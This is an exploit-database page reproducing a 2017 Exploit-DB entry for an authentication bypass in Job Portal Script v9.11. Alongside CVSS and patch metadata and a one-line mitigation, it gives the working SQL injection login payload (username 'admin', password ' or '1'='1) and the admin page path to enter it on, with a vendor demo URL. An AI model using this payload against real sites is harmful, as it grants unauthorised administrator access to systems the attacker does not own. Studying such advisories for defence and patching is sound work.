header-logo
Suggest Exploit
vendor:
Job Portal Script
by:
Dawid Morawski
7,5
CVSS
HIGH
Authentication bypass
287
CWE
Product Name: Job Portal Script
Affected Version From: v9.11
Affected Version To: v9.11
Patch Exists: NO
Related CWE: N/A
CPE: //a:itechscripts:job_portal_script
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2017

Job Portal Script v9.11 Authentication bypass

By setting the username as 'admin' and the password as ' or '1'='1', an attacker can bypass the authentication of Job Portal Script v9.11.

Mitigation:

Ensure that authentication credentials are properly validated and sanitized.
Source

Exploit-DB raw data:

# Vulnerability: Job Portal Script v9.11 Authentication bypass
# Date: 12.01.2017
# Software link: http://itechscripts.com/job-portal-script/
# Demo:  http://job-portal.itechscripts.com
# Price: 199$
# Category: webapps
# Exploit Author: Dawid Morawski
# Website: http://www.morawskiweb.pl
# Contact: dawid.morawski1990@gmail.com
#######################################


Go to http://localhost/[PATH]/admin/index.php and set:

Username: admin
Password: ' or '1'='1